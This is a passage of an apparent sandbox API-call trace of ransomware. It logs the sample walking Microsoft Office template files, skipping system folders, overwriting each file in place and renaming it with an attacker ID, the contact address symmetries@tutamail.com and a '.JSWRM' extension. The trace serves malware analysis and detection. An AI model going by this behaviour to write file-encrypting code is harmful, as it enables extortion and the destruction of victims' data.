Office\\root\\Office16\\PUBWIZ\\BORDERBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\borderbb.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BORDERBB.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\borderbb.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.526] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21863ca8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21863ca8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21863ca8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f046, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BRCH98SP.POC", cAlternateFileName="")) returned 1 [0140.526] lstrcmpiW (lpString1="BRCH98SP.POC", lpString2=".") returned 1 [0140.526] lstrcmpiW (lpString1="BRCH98SP.POC", lpString2="..") returned 1 [0140.526] lstrcmpiW (lpString1="BRCH98SP.POC", lpString2="...") returned 1 [0140.526] lstrcmpiW (lpString1="BRCH98SP.POC", lpString2="windows") returned -1 [0140.526] lstrcmpiW (lpString1="BRCH98SP.POC", lpString2="recovery") returned -1 [0140.526] lstrcmpiW (lpString1="BRCH98SP.POC", lpString2="perflogs") returned -1 [0140.526] lstrcmpiW (lpString1="BRCH98SP.POC", lpString2="documents and settings") returned -1 [0140.526] lstrcmpiW (lpString1="BRCH98SP.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.526] lstrcmpiW (lpString1="BRCH98SP.POC", lpString2="system volume information") returned -1 [0140.526] lstrcmpiW (lpString1="BRCH98SP.POC", lpString2="msocache") returned -1 [0140.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCH98SP.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCH98SP.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRCH98SP.POC", lpUsedDefaultChar=0x0) returned 12 [0140.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCH98SP.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCH98SP.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRCH98SP.POC", lpUsedDefaultChar=0x0) returned 12 [0140.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BRCH98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brch98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.528] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=258118) returned 1 [0140.528] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.528] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.540] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.540] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.540] CloseHandle (hObject=0x238) returned 1 [0140.540] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BRCH98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brch98sp.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BRCH98SP.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brch98sp.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.541] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2183da4c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2183da4c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218b0166, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x98f72, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BRCHUR11.POC", cAlternateFileName="")) returned 1 [0140.541] lstrcmpiW (lpString1="BRCHUR11.POC", lpString2=".") returned 1 [0140.541] lstrcmpiW (lpString1="BRCHUR11.POC", lpString2="..") returned 1 [0140.541] lstrcmpiW (lpString1="BRCHUR11.POC", lpString2="...") returned 1 [0140.542] lstrcmpiW (lpString1="BRCHUR11.POC", lpString2="windows") returned -1 [0140.542] lstrcmpiW (lpString1="BRCHUR11.POC", lpString2="recovery") returned -1 [0140.542] lstrcmpiW (lpString1="BRCHUR11.POC", lpString2="perflogs") returned -1 [0140.542] lstrcmpiW (lpString1="BRCHUR11.POC", lpString2="documents and settings") returned -1 [0140.542] lstrcmpiW (lpString1="BRCHUR11.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.542] lstrcmpiW (lpString1="BRCHUR11.POC", lpString2="system volume information") returned -1 [0140.542] lstrcmpiW (lpString1="BRCHUR11.POC", lpString2="msocache") returned -1 [0140.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCHUR11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCHUR11.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRCHUR11.POC", lpUsedDefaultChar=0x0) returned 12 [0140.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCHUR11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCHUR11.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRCHUR11.POC", lpUsedDefaultChar=0x0) returned 12 [0140.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BRCHUR11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brchur11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.543] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=626546) returned 1 [0140.543] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.543] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.556] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.556] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.557] CloseHandle (hObject=0x238) returned 1 [0140.557] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BRCHUR11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brchur11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BRCHUR11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brchur11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.558] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218177f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218177f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218b0166, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x243f1a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BRCHUR98.POC", cAlternateFileName="")) returned 1 [0140.558] lstrcmpiW (lpString1="BRCHUR98.POC", lpString2=".") returned 1 [0140.558] lstrcmpiW (lpString1="BRCHUR98.POC", lpString2="..") returned 1 [0140.558] lstrcmpiW (lpString1="BRCHUR98.POC", lpString2="...") returned 1 [0140.558] lstrcmpiW (lpString1="BRCHUR98.POC", lpString2="windows") returned -1 [0140.558] lstrcmpiW (lpString1="BRCHUR98.POC", lpString2="recovery") returned -1 [0140.558] lstrcmpiW (lpString1="BRCHUR98.POC", lpString2="perflogs") returned -1 [0140.558] lstrcmpiW (lpString1="BRCHUR98.POC", lpString2="documents and settings") returned -1 [0140.558] lstrcmpiW (lpString1="BRCHUR98.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.558] lstrcmpiW (lpString1="BRCHUR98.POC", lpString2="system volume information") returned -1 [0140.558] lstrcmpiW (lpString1="BRCHUR98.POC", lpString2="msocache") returned -1 [0140.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCHUR98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCHUR98.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRCHUR98.POC", lpUsedDefaultChar=0x0) returned 12 [0140.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCHUR98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRCHUR98.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRCHUR98.POC", lpUsedDefaultChar=0x0) returned 12 [0140.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BRCHUR98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brchur98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.559] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2375450) returned 1 [0140.559] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.559] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.600] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.600] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.601] CloseHandle (hObject=0x238) returned 1 [0140.601] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BRCHUR98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brchur98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BRCHUR98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brchur98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.603] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21863ca8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21863ca8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21863ca8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa7190, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BROCHURE.DPV", cAlternateFileName="")) returned 1 [0140.603] lstrcmpiW (lpString1="BROCHURE.DPV", lpString2=".") returned 1 [0140.603] lstrcmpiW (lpString1="BROCHURE.DPV", lpString2="..") returned 1 [0140.603] lstrcmpiW (lpString1="BROCHURE.DPV", lpString2="...") returned 1 [0140.603] lstrcmpiW (lpString1="BROCHURE.DPV", lpString2="windows") returned -1 [0140.603] lstrcmpiW (lpString1="BROCHURE.DPV", lpString2="recovery") returned -1 [0140.603] lstrcmpiW (lpString1="BROCHURE.DPV", lpString2="perflogs") returned -1 [0140.603] lstrcmpiW (lpString1="BROCHURE.DPV", lpString2="documents and settings") returned -1 [0140.603] lstrcmpiW (lpString1="BROCHURE.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.603] lstrcmpiW (lpString1="BROCHURE.DPV", lpString2="system volume information") returned -1 [0140.603] lstrcmpiW (lpString1="BROCHURE.DPV", lpString2="msocache") returned -1 [0140.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BROCHURE.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BROCHURE.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BROCHURE.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BROCHURE.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BROCHURE.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BROCHURE.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BROCHURE.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brochure.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.604] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=684432) returned 1 [0140.604] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.604] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.618] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.618] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.618] CloseHandle (hObject=0x238) returned 1 [0140.618] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BROCHURE.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brochure.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BROCHURE.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brochure.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.620] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21863ca8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21863ca8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21863ca8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x757a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BROCHURE.XML", cAlternateFileName="")) returned 1 [0140.620] lstrcmpiW (lpString1="BROCHURE.XML", lpString2=".") returned 1 [0140.620] lstrcmpiW (lpString1="BROCHURE.XML", lpString2="..") returned 1 [0140.620] lstrcmpiW (lpString1="BROCHURE.XML", lpString2="...") returned 1 [0140.620] lstrcmpiW (lpString1="BROCHURE.XML", lpString2="windows") returned -1 [0140.620] lstrcmpiW (lpString1="BROCHURE.XML", lpString2="recovery") returned -1 [0140.620] lstrcmpiW (lpString1="BROCHURE.XML", lpString2="perflogs") returned -1 [0140.620] lstrcmpiW (lpString1="BROCHURE.XML", lpString2="documents and settings") returned -1 [0140.620] lstrcmpiW (lpString1="BROCHURE.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.620] lstrcmpiW (lpString1="BROCHURE.XML", lpString2="system volume information") returned -1 [0140.620] lstrcmpiW (lpString1="BROCHURE.XML", lpString2="msocache") returned -1 [0140.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BROCHURE.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BROCHURE.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BROCHURE.XML", lpUsedDefaultChar=0x0) returned 12 [0140.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BROCHURE.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BROCHURE.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BROCHURE.XML", lpUsedDefaultChar=0x0) returned 12 [0140.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BROCHURE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brochure.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.621] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30074) returned 1 [0140.621] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.621] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x7570, lpOverlapped=0x0) returned 1 [0140.624] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.624] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x7570, lpOverlapped=0x0) returned 1 [0140.625] CloseHandle (hObject=0x238) returned 1 [0140.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BROCHURE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brochure.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BROCHURE.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\brochure.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.626] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21889f0d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21889f0d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21889f0d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BS2BARB.POC", cAlternateFileName="")) returned 1 [0140.626] lstrcmpiW (lpString1="BS2BARB.POC", lpString2=".") returned 1 [0140.626] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="..") returned 1 [0140.626] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="...") returned 1 [0140.626] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="windows") returned -1 [0140.626] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="recovery") returned -1 [0140.626] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="perflogs") returned -1 [0140.626] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="documents and settings") returned -1 [0140.626] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.626] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="system volume information") returned -1 [0140.626] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="msocache") returned -1 [0140.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 